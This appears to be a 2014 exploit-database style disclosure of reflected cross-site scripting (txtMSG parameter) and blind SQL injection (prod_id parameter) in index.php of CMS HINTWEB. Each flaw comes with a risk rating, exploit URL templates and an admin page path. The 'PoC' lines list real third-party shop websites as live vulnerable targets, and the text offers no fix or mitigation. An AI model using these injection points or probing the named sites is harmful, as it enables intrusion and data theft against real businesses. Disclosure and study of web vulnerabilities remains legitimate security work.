[+] Cross Site Scripting on CMS HINTWEB
[+] Date: 04/05/2014
[+] Risk: LOW
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.hintweb.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: index.php
[+] Exploit : http://host//index.php?txtMSG=[XSS]
[+] PoC : http://www.z3som.com.br/site/index.php?txtMSG=Felipe Andrian Peixoto
          http://www.casadoscelulares.com/index.php?txtMSG=Felipe Andrian Peixoto
          http://lojaspopular.com.br/index.php?txtMSG=Felipe Andrian Peixoto
[+] Admin Page: http://host/adm/

[+] Blind Sql Injection on CMS HINTWEB
[+] Date: 04/05/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.hintweb.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: index.php
[+] Exploit : http://host/index.php?ID=produto&prod_id=[ Blind SQL Injection] 
[+] PoC:  http://www.z3som.com.br/site/index.php?ID=produto&prod_id=[SQL Injection] 
          http://www.lojaspopular.com.br/index.php?ID=produto&prod_id=[SQL Injection] 
          http://casadoscelulares.com/index.php?ID=produto&prod_id=[SQL Injection] 
[+] Admin Page: http://host/adm/